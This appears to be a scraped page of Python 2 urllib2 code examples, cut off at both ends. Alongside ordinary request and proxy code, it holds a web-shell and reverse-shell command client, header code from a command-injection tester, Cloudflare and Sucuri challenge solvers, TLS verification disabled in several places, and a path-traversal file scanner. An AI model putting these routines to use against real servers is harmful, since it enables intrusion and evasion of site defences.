            # Check if the method is POST
            if self.method == 'post' or (self.parameter
                                         and self.method != 'cookie'):
                self.method = 'post'
                parameters = urlencode({
                    self.parameter:
                    'echo ::command_start::;' + self.cmd.strip(';') +
                    ';echo ::command_end::;'
                })
                try:
                    sc = map(str.rstrip,
                             opener.open(self.url, parameters).readlines())
                    sc = '::command_deli::'.join(sc)
                    sc = re.search('::command_start::(.*?)::command_end::', sc)
                    if sc:
                        sc = sc.group(1).split('::command_deli::')[1:-1]
                    else:
                        parameters = urlencode(
                            {self.parameter: self.cmd.strip(';')})
                        sc = map(str.rstrip,
                                 opener.open(self.url, parameters).readlines())
                    return sc
                except InvalidURL:
                    exit(errmsg)


#                except:
#                    exit(fourzerofourmsg)

# If the method used is GET
            else:
                try:
                    if self.method == 'cookie':
                        opener.addheaders += [
                            ('Cookie', '{0}={1}'.format(
                                self.parameter,
                                quote('echo ::command_start::;' +
                                      self.cmd.rstrip().strip(';') +
                                      ';echo ::command_end::;'))),
                        ]
                        sc = map(str.rstrip, opener.open(self.url).readlines())
                    else:
                        sc = map(
                            str.rstrip,
                            opener.open('{0}{1}'.format(
                                self.url,
                                quote('echo ::command_start::;' +
                                      self.cmd.strip(';') +
                                      ';echo ::command_end::;'))).readlines())
                    sc = '::command_deli::'.join(sc)
                    sc = re.search('::command_start::(.*?)::command_end::', sc)
                    if sc:
                        sc = sc.group(1).split('::command_deli::')[1:-1]
                    else:
                        sc = map(
                            str.rstrip,
                            opener.open('{0}{1}'.format(
                                self.url,
                                quote(self.cmd.strip(';')))).readlines())

                    return sc
                except InvalidURL:
                    exit(errmsg)
                except HTTPError:
                    cprint(
                        '[!] This is a 414 error code and you need to work with a POST method',
                        'red')
                    exit()

        elif getargs.listen:
            try:
                if (listen.socket.sendall(cmd + "\n") != None):
                    errmsg = colored('\n[!] Error in sending data (#1)', 'red')
                    cprint(errmsg, 'red')
                time.sleep(1)

                sc = ''
                buffer = listen.socket.recv(1024)

                if buffer == '':
                    errmsg = colored('\n[!] Lost connection. Exiting...',
                                     'red')
                    cprint(errmsg, 'red')
                    listen.socket.close()
                    exit(1)
                while buffer != '':
                    sc = sc + buffer  # sc +=+ buffer # convert " to '
                    try:
                        buffer = listen.socket.recv(1024)
                    except:
                        buffer = ''
                sc = [
                    i for i in sc.split('\n')[:-1] if not any(s in i for s in [
                        'job control in this shell',
                        'cannot set terminal process group',
                        'can\'t access tty', '<'
                    ])
                ]
                return sc
            except:
                if (listen.socket.sendall(cmd + "\n") != None):
                    errmsg = colored('\n[!] [!] Error in sending data (#2)',
                                     'red')
                    cprint(errmsg, 'red')
                pass
        elif getargs.connect:
            try:
                if (connect.socket.send(cmd + "\n") == None):
                    errmsg = colored('\n[!] Error in sending data (#1)', 'red')
                    cprint(errmsg, 'red')
                time.sleep(1)

                sc = ''
                buffer = connect.socket.recv(1024)

                if buffer == '':
                    errmsg = colored('\n[!] Lost connection. Exiting...',
                                     'red')
                    cprint(errmsg, 'red')
                    connect.socket.close()
                    exit(1)
                while buffer != '':
                    sc = sc + buffer
                    try:
                        buffer = connect.socket.recv(1024)
                    except:
                        buffer = ''

                return sc.split('\n')[:-1]
            except:
                pass
        else:
            errmsg = colored('\n[!] Unsupported mode!', 'red')
            cprint(errmsg, 'red')
            exit(1)
Example #32
    @param proxy: The HTTP proxy server to use. For example:
        'http://proxy.example.com:3128/'
    @param user: The username to authenticate with. Use C{None} to disable 
    authentication.
    @param password: The password to authenticate with.
    """
    import urllib
    import urllib2

    if proxy is None:
        # Try and find the system proxy settings
        try:
            proxy = urllib.getproxies()['http']
        except KeyError:
            raise ValueError('Could not detect default proxy settings')

    # Set up the proxy handler
    proxy_handler = urllib2.ProxyHandler({'http': proxy})
    opener = urllib2.build_opener(proxy_handler)

    if user is not None:
        # Set up basic proxy authentication if provided
        password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
        password_manager.add_password(realm=None, uri=proxy, user=user,
                passwd=password)
        opener.add_handler(urllib2.ProxyBasicAuthHandler(password_manager))
        opener.add_handler(urllib2.ProxyDigestAuthHandler(password_manager))

    # Overide the existing url opener
    urllib2.install_opener(opener)
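Once the opener above is installed, later calls need no per-request proxy configuration; a minimal usage sketch (the URL is a placeholder):

# Sketch: after install_opener(), plain urlopen calls are routed through the
# authenticated proxy configured above.
html = urllib2.urlopen('http://example.com/').read()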
Example #33
def do_check(request):

    # Check if defined any Host HTTP header.
    if menu.options.host and settings.HOST_INJECTION == None:
        request.add_header(settings.HOST, menu.options.host)

    # Check if defined any User-Agent HTTP header.
    if menu.options.agent:
        request.add_header(settings.USER_AGENT, menu.options.agent)

    # Check if defined any Referer HTTP header.
    if menu.options.referer and settings.REFERER_INJECTION == None:
        request.add_header(settings.REFERER, menu.options.referer)

    # Check if defined any Cookie HTTP header.
    if menu.options.cookie and settings.COOKIE_INJECTION == False:
        request.add_header(settings.COOKIE, menu.options.cookie)

    if not checks.get_header(request.headers, settings.HTTP_ACCEPT_HEADER):
        request.add_header(settings.HTTP_ACCEPT_HEADER,
                           settings.HTTP_ACCEPT_HEADER_VALUE)

    # Appends a fake HTTP header 'X-Forwarded-For'
    if settings.TAMPER_SCRIPTS["xforwardedfor"]:
        from src.core.tamper import xforwardedfor
        xforwardedfor.tamper(request)

    # Check if defined any HTTP Authentication credentials.
    # HTTP Authentication: Basic / Digest Access Authentication.
    if not menu.options.ignore_401:
        if menu.options.auth_cred and menu.options.auth_type:
            try:
                settings.SUPPORTED_HTTP_AUTH_TYPES.index(
                    menu.options.auth_type)
                if menu.options.auth_type == "basic":
                    b64_string = base64.encodestring(
                        menu.options.auth_cred).replace('\n', '')
                    request.add_header("Authorization",
                                       "Basic " + b64_string + "")
                elif menu.options.auth_type == "digest":
                    try:
                        url = menu.options.url
                        try:
                            response = urllib2.urlopen(url)
                        except urllib2.HTTPError, e:
                            try:
                                authline = e.headers.get(
                                    'www-authenticate', '')
                                authobj = re.match('''(\w*)\s+realm=(.*),''',
                                                   authline).groups()
                                realm = authobj[1].split(',')[0].replace(
                                    "\"", "")
                                user_pass_pair = menu.options.auth_cred.split(
                                    ":")
                                username = user_pass_pair[0]
                                password = user_pass_pair[1]
                                authhandler = urllib2.HTTPDigestAuthHandler()
                                authhandler.add_password(
                                    realm, url, username, password)
                                opener = urllib2.build_opener(authhandler)
                                urllib2.install_opener(opener)
                                result = urllib2.urlopen(url)
                            except AttributeError:
                                pass
                    except urllib2.HTTPError, e:
                        pass
            except ValueError:
                err_msg = "Unsupported / Invalid HTTP authentication type '" + menu.options.auth_type + "'."
                err_msg += " Try basic or digest HTTP authentication type."
                print settings.print_critical_msg(err_msg)
                raise SystemExit()
        else:
            pass

    # The MIME media type for JSON.
    if settings.IS_JSON:
        request.add_header("Content-Type", "application/json")

    # Check if defined any extra HTTP headers.
    if menu.options.headers or menu.options.header:
        # Do replacement with the 'INJECT_HERE' tag, if the wildcard char is provided.
        if menu.options.headers:
            menu.options.headers = checks.wildcard_character(
                menu.options.headers)
            extra_headers = menu.options.headers
        else:
            menu.options.header = checks.wildcard_character(
                menu.options.header)
            extra_headers = menu.options.header

        extra_headers = extra_headers.replace(":", ": ")
        if ": //" in extra_headers:
            extra_headers = extra_headers.replace(": //", "://")

        if "\\n" in extra_headers:
            extra_headers = extra_headers.split("\\n")
            # Remove empty strings
            extra_headers = [x for x in extra_headers if x]
            if menu.options.header and not menu.options.headers and len(
                    extra_headers) > 1:
                warn_msg = "Swithing '--header' to '--headers' "
                warn_msg += "due to multiple extra HTTP headers."
                print settings.print_warning_msg(warn_msg)

        else:
            tmp_extra_header = []
            tmp_extra_header.append(extra_headers)
            extra_headers = tmp_extra_header

        for extra_header in extra_headers:
            # Extra HTTP Header name
            http_header_name = re.findall(r"(.*): ", extra_header)
            http_header_name = ''.join(http_header_name).strip()
            # Extra HTTP Header value
            http_header_value = re.findall(r":(.*)", extra_header)
            http_header_value = ''.join(http_header_value).strip()
            # Check if it is a custom header injection.
            if settings.CUSTOM_HEADER_INJECTION == False and \
               settings.INJECT_TAG in http_header_value:
                settings.CUSTOM_HEADER_INJECTION = True
                settings.CUSTOM_HEADER_NAME = http_header_name
            request.add_header(http_header_name, http_header_value)
Example #34
    def get_cookie(self, netloc, ua, timeout):
        try:
            headers = {'User-Agent': ua}
            request = urllib2.Request(netloc)
            _add_request_header(request, headers)

            try:
                response = urllib2.urlopen(request, timeout=int(timeout))
            except urllib2.HTTPError as response:
                result = response.read(5242880)
                try:
                    encoding = response.info().getheader('Content-Encoding')
                except:
                    encoding = None
                if encoding == 'gzip':
                    result = gzip.GzipFile(
                        fileobj=StringIO.StringIO(result)).read()

            jschl = re.findall('name="jschl_vc" value="(.+?)"/>', result)[0]
            init = re.findall('setTimeout\(function\(\){\s*.*?.*:(.*?)};',
                              result)[-1]
            builder = re.findall(r"challenge-form\'\);\s*(.*)a.v", result)[0]
            decryptVal = self.parseJSString(init)
            lines = builder.split(';')

            for line in lines:
                if len(line) > 0 and '=' in line:
                    sections = line.split('=')
                    line_val = self.parseJSString(sections[1])
                    decryptVal = int(
                        eval(
                            str(decryptVal) + sections[0][-1] + str(line_val)))

            answer = decryptVal + len(urlparse.urlparse(netloc).netloc)
            query = '%s/cdn-cgi/l/chk_jschl?jschl_vc=%s&jschl_answer=%s' % (
                netloc, jschl, answer)

            if 'type="hidden" name="pass"' in result:
                passval = re.findall('name="pass" value="(.*?)"', result)[0]
                query = '%s/cdn-cgi/l/chk_jschl?pass=%s&jschl_vc=%s&jschl_answer=%s' % (
                    netloc, urllib.quote_plus(passval), jschl, answer)
                time.sleep(6)

            cookies = cookielib.LWPCookieJar()
            handlers = [
                urllib2.HTTPHandler(),
                urllib2.HTTPSHandler(),
                urllib2.HTTPCookieProcessor(cookies)
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

            try:
                request = urllib2.Request(query)
                _add_request_header(request, headers)
                response = urllib2.urlopen(request, timeout=int(timeout))
            except:
                pass

            cookie = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies])

            if 'cf_clearance' in cookie:
                self.cookie = cookie
        except:
            pass
Example #35
def request(url,
            close=True,
            redirect=True,
            error=False,
            proxy=None,
            post=None,
            headers=None,
            mobile=False,
            XHR=False,
            limit=None,
            referer=None,
            cookie=None,
            compression=True,
            output='',
            timeout='30',
            ignoreSsl=False,
            flare=True,
            ignoreErrors=None):
    try:
        if url is None:
            return None

        handlers = []

        if proxy is not None:
            handlers += [
                urllib2.ProxyHandler({'http': '%s' % (proxy)}),
                urllib2.HTTPHandler
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        if output == 'cookie' or output == 'extended' or not close is True:
            cookies = cookielib.LWPCookieJar()
            handlers += [
                urllib2.HTTPHandler(),
                urllib2.HTTPSHandler(),
                urllib2.HTTPCookieProcessor(cookies)
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        if ignoreSsl or ((2, 7, 8) < sys.version_info < (2, 7, 12)):
            try:
                import ssl
                ssl_context = ssl.create_default_context()
                ssl_context.check_hostname = False
                ssl_context.verify_mode = ssl.CERT_NONE
                handlers += [urllib2.HTTPSHandler(context=ssl_context)]
                opener = urllib2.build_opener(*handlers)
                opener = urllib2.install_opener(opener)
            except:
                pass

        if url.startswith('//'):
            url = 'http:' + url

        try:
            headers.update(headers)
        except:
            headers = {}

        if 'User-Agent' in headers:
            pass
        elif mobile is not True:
            # headers['User-Agent'] = agent()
            headers['User-Agent'] = cache.get(randomagent, 1)
        else:
            headers['User-Agent'] = 'Apple-iPhone/701.341'

        if 'Referer' in headers:
            pass
        elif referer is not None:
            headers['Referer'] = referer

        if 'Accept-Language' not in headers:
            headers['Accept-Language'] = 'en-US'

        if 'X-Requested-With' in headers:
            pass
        elif XHR is True:
            headers['X-Requested-With'] = 'XMLHttpRequest'

        if 'Cookie' in headers:
            pass
        elif cookie is not None:
            headers['Cookie'] = cookie

        if 'Accept-Encoding' in headers:
            pass
        elif compression and limit is None:
            headers['Accept-Encoding'] = 'gzip'

        if redirect is False:

            class NoRedirection(urllib2.HTTPErrorProcessor):
                def http_response(self, request, response):
                    return response

            opener = urllib2.build_opener(NoRedirection)
            opener = urllib2.install_opener(opener)

            try:
                del headers['Referer']
            except:
                pass

        if isinstance(post, dict):
            # Gets rid of the error: 'ascii' codec can't decode byte 0xd0 in position 0: ordinal not in range(128)
            for key, value in post.iteritems():
                try:
                    post[key] = value.encode('utf-8')
                except:
                    pass

            post = urllib.urlencode(post)

        request = urllib2.Request(url, data=post)
        _add_request_header(request, headers)

        try:
            response = urllib2.urlopen(request, timeout=int(timeout))
        except urllib2.HTTPError as response:
            try:
                ignore = ignoreErrors and (int(response.code) == ignoreErrors
                                           or int(
                                               response.code) in ignoreErrors)
            except:
                ignore = False

            if not ignore:
                if response.code in [301, 307, 308, 503]:
                    cf_result = response.read(5242880)

                    try:
                        encoding = response.info().getheader(
                            'Content-Encoding')
                    except:
                        encoding = None

                    if encoding == 'gzip':
                        cf_result = gzip.GzipFile(
                            fileobj=StringIO.StringIO(cf_result)).read()

                    if flare and 'cloudflare' in str(response.info()).lower():
                        try:
                            from resources.lib.modules import cfscrape
                            if isinstance(post, dict):
                                data = post
                            else:
                                try:
                                    data = urlparse.parse_qs(post)
                                except:
                                    data = None

                            scraper = cfscrape.CloudflareScraper()
                            response = scraper.request(
                                method='GET' if post is None else 'POST',
                                url=url,
                                headers=headers,
                                data=data,
                                timeout=int(timeout))
                            result = response.content
                            flare = 'cloudflare'  # Used below
                            try:
                                cookies = response.request._cookies
                            except:
                                log_utils.error()
                        except:
                            log_utils.error()

                    elif 'cf-browser-verification' in cf_result:
                        netloc = '%s://%s' % (urlparse.urlparse(url).scheme,
                                              urlparse.urlparse(url).netloc)
                        ua = headers['User-Agent']
                        cf = cache.get(cfcookie().get, 168, netloc, ua,
                                       timeout)
                        headers['Cookie'] = cf
                        request = urllib2.Request(url, data=post)
                        _add_request_header(request, headers)
                        response = urllib2.urlopen(request,
                                                   timeout=int(timeout))
                    else:
                        log_utils.log(
                            'Request-Error (%s): %s' %
                            (str(response.code), url), log_utils.LOGDEBUG)
                        if error is False:
                            return
                else:
                    log_utils.log(
                        'Request-Error (%s): %s' % (str(response.code), url),
                        log_utils.LOGDEBUG)
                    if error is False:
                        return

        if output == 'cookie':
            try:
                result = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass
            try:
                result = cf
            except:
                pass

            if close is True:
                response.close()
            return result

        elif output == 'geturl':
            result = response.geturl()
            if close is True:
                response.close()
            return result

        elif output == 'headers':
            result = response.headers
            if close is True:
                response.close()
            return result

        elif output == 'chunk':
            try:
                content = int(response.headers['Content-Length'])
            except:
                content = (2049 * 1024)

            if content < (2048 * 1024):
                return
            result = response.read(16 * 1024)
            if close is True:
                response.close()
            return result

        if flare != 'cloudflare':
            if limit == '0':
                result = response.read(224 * 1024)
            elif limit is not None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)

        try:
            encoding = response.info().getheader('Content-Encoding')
        except:
            encoding = None

        if encoding == 'gzip':
            result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read()

        if 'sucuri_cloudproxy_js' in result:
            su = sucuri().get(result)

            headers['Cookie'] = su

            request = urllib2.Request(url, data=post)
            _add_request_header(request, headers)

            response = urllib2.urlopen(request, timeout=int(timeout))

            if limit == '0':
                result = response.read(224 * 1024)
            elif limit is not None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)

            try:
                encoding = response.info().getheader('Content-Encoding')
            except:
                encoding = None
            if encoding == 'gzip':
                result = gzip.GzipFile(
                    fileobj=StringIO.StringIO(result)).read()

        if 'Blazingfast.io' in result and 'xhr.open' in result:
            netloc = '%s://%s' % (urlparse.urlparse(url).scheme,
                                  urlparse.urlparse(url).netloc)
            ua = headers['User-Agent']
            headers['Cookie'] = cache.get(bfcookie().get, 168, netloc, ua,
                                          timeout)
            result = _basic_request(url,
                                    headers=headers,
                                    post=post,
                                    timeout=timeout,
                                    limit=limit)

        if output == 'extended':
            try:
                response_headers = dict([(item[0].title(), item[1])
                                         for item in response.info().items()])
            except:
                response_headers = response.headers

            try:
                response_code = str(response.code)
            except:
                response_code = str(response.status_code)  # response is a CFScrape Requests object here

            try:
                cookie = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass

            try:
                cookie = cf
            except:
                pass

            if close is True:
                response.close()
            return (result, response_code, response_headers, headers, cookie)
        else:
            if close is True:
                response.close()
            return result

    except Exception as e:
        log_utils.error()
        log_utils.log('Request-Error: (%s) => %s' % (str(e), url),
                      log_utils.LOGDEBUG)
        return
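A minimal usage sketch of the wrapper above, assuming it is importable as a module-level request() (the 'client' alias and the example URL are illustrative, not confirmed by the snippet):

# Hypothetical usage of the request() wrapper defined above; the module name
# and the URL are stand-ins for illustration only.
from resources.lib.modules import client

html = client.request('http://example.com/')                     # plain body, gzip handled internally
cookie = client.request('http://example.com/', output='cookie')  # 'name=value; ...' cookie string
body, code, resp_headers, req_headers, cookie = client.request(
    'http://example.com/', output='extended')                    # full round-trip details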
Ejemplo n.º 36
0
def request(url,
            close=True,
            redirect=True,
            error=False,
            proxy=None,
            post=None,
            headers=None,
            mobile=False,
            limit=None,
            referer=None,
            cookie=None,
            output='',
            timeout='30'):
    try:
        #control.log('@@@@@@@@@@@@@@ - URL:%s' % url)
        handlers = []

        if not proxy == None:
            handlers += [
                urllib2.ProxyHandler({'http': '%s' % (proxy)}),
                urllib2.HTTPHandler
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        if output == 'cookie2' or output == 'cookie' or output == 'extended' or not close == True:
            cookies = cookielib.LWPCookieJar()
            handlers += [
                urllib2.HTTPHandler(),
                urllib2.HTTPSHandler(),
                urllib2.HTTPCookieProcessor(cookies)
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        try:
            if sys.version_info < (2, 7, 9): raise Exception()
            import ssl
            ssl_context = ssl.create_default_context()
            ssl_context.check_hostname = False
            ssl_context.verify_mode = ssl.CERT_NONE
            handlers += [urllib2.HTTPSHandler(context=ssl_context)]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)
        except:
            pass

        if not isinstance(headers, dict):
            headers = {}
        if 'User-Agent' in headers:
            pass
        elif not mobile == True:
            #headers['User-Agent'] = agent()
            headers['User-Agent'] = cache.get(randomagent, 1)
        else:
            headers['User-Agent'] = 'Apple-iPhone/701.341'
        if 'Referer' in headers:
            pass
        elif referer == None:
            headers['Referer'] = '%s://%s/' % (urlparse.urlparse(url).scheme,
                                               urlparse.urlparse(url).netloc)
        else:
            headers['Referer'] = referer
        if not 'Accept-Language' in headers:
            headers['Accept-Language'] = 'en-US'
        if 'Cookie' in headers:
            pass
        elif not cookie == None:
            headers['Cookie'] = cookie

        if redirect == False:

            class NoRedirection(urllib2.HTTPErrorProcessor):
                def http_response(self, request, response):
                    return response

            opener = urllib2.build_opener(NoRedirection)
            opener = urllib2.install_opener(opener)

            try:
                del headers['Referer']
            except:
                pass

        request = urllib2.Request(url, data=post, headers=headers)

        try:
            response = urllib2.urlopen(request, timeout=int(timeout))
        except urllib2.HTTPError as response:
            control.log("AAAA- CODE %s|%s " % (url, response.code))
            if response.code == 503:
                if 'cf-browser-verification' in response.read(5242880):
                    control.log("CF-OK")

                    netloc = '%s://%s' % (urlparse.urlparse(url).scheme,
                                          urlparse.urlparse(url).netloc)
                    cf = cache.get(cfcookie, 168, netloc,
                                   headers['User-Agent'], timeout)
                    headers['Cookie'] = cf
                    request = urllib2.Request(url, data=post, headers=headers)
                    response = urllib2.urlopen(request, timeout=int(timeout))
                elif error == False:
                    return

            elif response.code == 307:
                control.log("AAAA- Location: %s" %
                            (response.headers['Location'].rstrip()))
                cookie = ''
                try:
                    cookie = '; '.join(
                        ['%s=%s' % (i.name, i.value) for i in cookies])
                except:
                    pass
                headers['Cookie'] = cookie
                request = urllib2.Request(response.headers['Location'],
                                          data=post,
                                          headers=headers)
                response = urllib2.urlopen(request, timeout=int(timeout))
                #control.log("AAAA- BBBBBBB %s" %  response.code)

            elif error == False:
                print("Response code", response.code, response.msg, url)
                return

        if output == 'cookie':
            try:
                result = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass
            try:
                result = cf
            except:
                pass

        elif output == 'response':
            if limit == '0':
                result = (str(response.code), response.read(224 * 1024))
            elif not limit == None:
                result = (str(response.code), response.read(int(limit) * 1024))
            else:
                result = (str(response.code), response.read(5242880))

        elif output == 'chunk':
            try:
                content = int(response.headers['Content-Length'])
            except:
                content = (2049 * 1024)
            if content < (2048 * 1024): return
            result = response.read(16 * 1024)

        elif output == 'extended':
            try:
                cookie = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass
            try:
                cookie = cf
            except:
                pass
            content = response.headers
            result = response.read(5242880)
            return (result, headers, content, cookie)

        elif output == 'geturl':
            result = response.geturl()

        elif output == 'headers':
            content = response.headers
            return content

        else:
            if limit == '0':
                result = response.read(224 * 1024)
            elif not limit == None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)

        if close == True:
            response.close()

        return result
    except Exception as e:
        control.log('Client ERR %s, url: %s' % (e, url))
        return
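The redirect-suppression trick used above (an HTTPErrorProcessor that simply hands back the response) also works on its own; a standalone sketch, with the target URL made up:

# Sketch: stop urllib2 from following redirects by short-circuiting error
# processing, mirroring the NoRedirection class defined in the snippet above.
import urllib2

class NoRedirection(urllib2.HTTPErrorProcessor):
    def http_response(self, request, response):
        # Returning the response as-is keeps 301/302/307 from being followed.
        return response
    https_response = http_response

opener = urllib2.build_opener(NoRedirection)
response = opener.open('http://example.com/some-redirecting-path')  # illustrative URL
print response.code                     # e.g. 302 instead of the final page's 200
print response.headers.get('Location')  # redirect target, if any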
Ejemplo n.º 37
0
'''
response = urllib2.urlopen('http://www.baidu.com')

print response.getcode()
cont = response.read()
'''

url = 'http://www.baidu.com'
request = urllib2.Request(url)

request.add_header('User-Agent', 'Mozilla/5.0')

response = urllib2.urlopen(request)
print response.getcode()
cont = response.read()
'''
url = "http://www.baid.com"
cj = cookielib.CookieJar()

opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)

response = urllib2.urlopen(url)
print response.getcode()
cont = response.read()
'''

try:
    f = os.open('index.html', os.O_CREAT | os.O_RDWR)
    os.write(f, cont)
    os.close(f)
except:
    pass
Ejemplo n.º 38
0
    def download_file(self):
        logger.info("Direct download")

        headers = []

        # Make sure the file can actually be created
        logger.info("nombrefichero=" + self.file_name)
        self.file_name = xbmc.makeLegalFilename(self.file_name)
        logger.info("nombrefichero=" + self.file_name)
        logger.info("url=" + self.url)

        # Create the file
        existSize = 0
        f = open(self.file_name, 'wb')
        grabado = 0

        # Parse headers embedded in the URL, XBMC-style
        if "|" in self.url:
            additional_headers = self.url.split("|")[1]
            if "&" in additional_headers:
                additional_headers = additional_headers.split("&")
            else:
                additional_headers = [additional_headers]

            for additional_header in additional_headers:
                logger.info("additional_header: " + additional_header)
                name = re.findall("(.*?)=.*?", additional_header)[0]
                value = urllib.unquote_plus(
                    re.findall(".*?=(.*?)$", additional_header)[0])
                headers.append([name, value])

            self.url = self.url.split("|")[0]
            logger.info("url=" + self.url)

        # Set the socket timeout to 60 seconds
        socket.setdefaulttimeout(60)

        # Build the request and add the headers
        h = urllib2.HTTPHandler(debuglevel=0)
        request = urllib2.Request(self.url)
        for header in headers:
            logger.info("Header=" + header[0] + ": " + header[1])
            request.add_header(header[0], header[1])

        # Send the request
        opener = urllib2.build_opener(h)
        urllib2.install_opener(opener)
        try:
            connexion = opener.open(request)
        except urllib2.HTTPError as e:
            logger.error("error %d (%s) al abrir la url %s" %
                         (e.code, e.msg, self.url))
            # print e.code
            # print e.msg
            # print e.hdrs
            # print e.fp
            f.close()

            # Error 416 means the requested range exceeds the file size => the download is already complete
            if e.code == 416:
                return 0
            else:
                return -2
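The "url|Header1=Value1&Header2=Value2" convention parsed above can be pulled into a small helper; a sketch under that assumption (split_xbmc_url and the sample URL are made up for illustration):

import re
import urllib

def split_xbmc_url(url):
    # Split an XBMC-style "url|Header=Value&Header=Value" string into the bare
    # URL and a list of [name, value] header pairs, as download_file() does.
    headers = []
    if "|" in url:
        url, extra = url.split("|", 1)
        for chunk in extra.split("&"):
            name = re.findall("(.*?)=.*?", chunk)[0]
            value = urllib.unquote_plus(re.findall(".*?=(.*?)$", chunk)[0])
            headers.append([name, value])
    return url, headers

print split_xbmc_url("http://example.com/video.mp4|Referer=http%3A%2F%2Fexample.com%2F&User-Agent=Mozilla")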
Ejemplo n.º 39
0
def main():
    """
    Initializes and executes the program
    """

    global args

    kb.files = []
    kb.found = False
    kb.print_lock = threading.Lock()
    kb.value_lock = threading.Lock()
    kb.versioned_locations = {}

    check_revision()

    print(BANNER)

    args = parse_args()

    if args.update:
        update()
        exit()

    with open("versions.ini") as f:
        section = None
        for line in f.xreadlines():
            line = line.strip()
            if re.match(r"\[.+\]", line):
                section = line.strip("[]")
            elif line:
                if section not in kb.versioned_locations:
                    kb.versioned_locations[section] = []
                kb.versioned_locations[section].append(line)

    cases = get_cases(args) if not args.list_file else load_list(
        args.list_file)

    if not cases:
        print("[!] No available test cases with the specified attributes.\n"
              "[!] Please verify available options with --list.")
        exit()

    if args.list:
        args.list = args.list.lower()

        _ = ("category", "software", "os")
        if args.list not in _:
            print("[!] Valid values for option '--list' are: %s" %
                  ", ".join(_))
            exit()

        print("[i] Listing available filters for usage with option '--%s':\n" %
              args.list)

        try:
            for _ in set([_[args.list] for _ in cases]):
                print(_ if re.search(r"\A[A-Za-z0-9]+\Z", _) else '"%s"' % _)
        except KeyError:
            pass
        finally:
            exit()

    if args.ignore_proxy:
        _ = ProxyHandler({})
        opener = build_opener(_)
        install_opener(opener)
    elif args.proxy:
        match = re.search(
            r"(?P<type>[^:]+)://(?P<address>[^:]+):(?P<port>\d+)", args.proxy,
            re.I)
        if match:
            if match.group("type").upper() in (PROXY_TYPE.HTTP,
                                               PROXY_TYPE.HTTPS):
                _ = ProxyHandler({match.group("type"): args.proxy})
                opener = build_opener(_)
                install_opener(opener)
            else:
                from thirdparty.socks import socks
                if match.group("type").upper() == PROXY_TYPE.SOCKS4:
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4,
                                          match.group("address"),
                                          int(match.group("port")), True)
                elif match.group("type").upper() == PROXY_TYPE.SOCKS5:
                    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5,
                                          match.group("address"),
                                          int(match.group("port")), True)
        else:
            print(
                "[!] Wrong proxy format (proper example: \"http://127.0.0.1:8080\")."
            )
            exit()

    if args.random_agent:
        with open(USER_AGENTS_FILE, 'r') as f:
            args.user_agent = random.sample(f.readlines(), 1)[0]

    kb.parsed_target_url = urlsplit(args.url)
    kb.request_params = args.data if args.data else kb.parsed_target_url.query

    if not args.param:
        match = re.match("(?P<param>[^=&]+)=(?P<value>[^=&]+)",
                         kb.request_params)
        if match:
            args.param = match.group("param")
        else:
            found = False

            for match in re.finditer("(?P<param>[^=&]+)=(?P<value>[^=&]*)",
                                     kb.request_params):
                found = True
                print("[x] Parameter with empty value found ('%s')." %
                      match.group("param"))

            if found:
                print(
                    "[!] Please always use non-empty (valid) parameter values."
                )

            print("[!] No usable GET/POST parameters found.")
            exit()

    if args.os:
        kb.restrict_os = args.os

    print("[i] Starting scan at: %s\n" % time.strftime("%X"))
    print("[i] Checking original response...")

    request_args = prepare_request(None)
    request_args["url"] = args.url

    if args.data:
        request_args["data"] = args.data

    kb.original_response = get_page(**request_args)

    if not kb.original_response:
        print("[!] Something seems to be wrong with connection settings.")
        if not args.verbose:
            print("[i] Please rerun with switch '-v'.")
        exit()

    print("[i] Checking invalid response...")

    request_args = prepare_request(
        "%s%s%s" % (args.prefix, INVALID_FILENAME, args.postfix))
    kb.invalid_response = get_page(**request_args)

    print("[i] Done!")
    print("[i] Searching for files...")

    if args.threads > 1:
        print("[i] Starting %d threads." % args.threads)

    threads = []
    for i in xrange(args.threads):
        thread = threading.Thread(
            target=try_cases,
            args=([cases[_] for _ in xrange(i, len(cases), args.threads)], ))
        thread.daemon = True
        thread.start()
        threads.append(thread)

    alive = True
    while alive:
        alive = False
        for thread in threads:
            if thread.isAlive():
                alive = True
                time.sleep(0.1)

    if not kb.found:
        print("[i] No files found!")
    elif args.verbose:
        print("\n[i] Files found:")
        for _ in kb.files:
            print("[o] %s" % _)

    print("  \n[i] File search complete.")
    print("\n[i] Finishing scan at: %s\n" % time.strftime("%X"))
Ejemplo n.º 40
0
def request(url, close=True, redirect=True, error=False, proxy=None, post=None, headers=None, mobile=False, XHR=False, limit=None, referer=None, cookie=None, compression=True, output='', timeout='30'):
    try:
        if not url:
            return

        handlers = []

        if not proxy == None:
            handlers += [urllib2.ProxyHandler({'http':'%s' % (proxy)}), urllib2.HTTPHandler]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)


        if output == 'cookie' or output == 'extended' or not close == True:
            cookies = cookielib.LWPCookieJar()
            handlers += [urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies)]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        if (2, 7, 8) < sys.version_info < (2, 7, 12):
            try:
                import ssl; ssl_context = ssl.create_default_context()
                ssl_context.check_hostname = False
                ssl_context.verify_mode = ssl.CERT_NONE
                handlers += [urllib2.HTTPSHandler(context=ssl_context)]
                opener = urllib2.build_opener(*handlers)
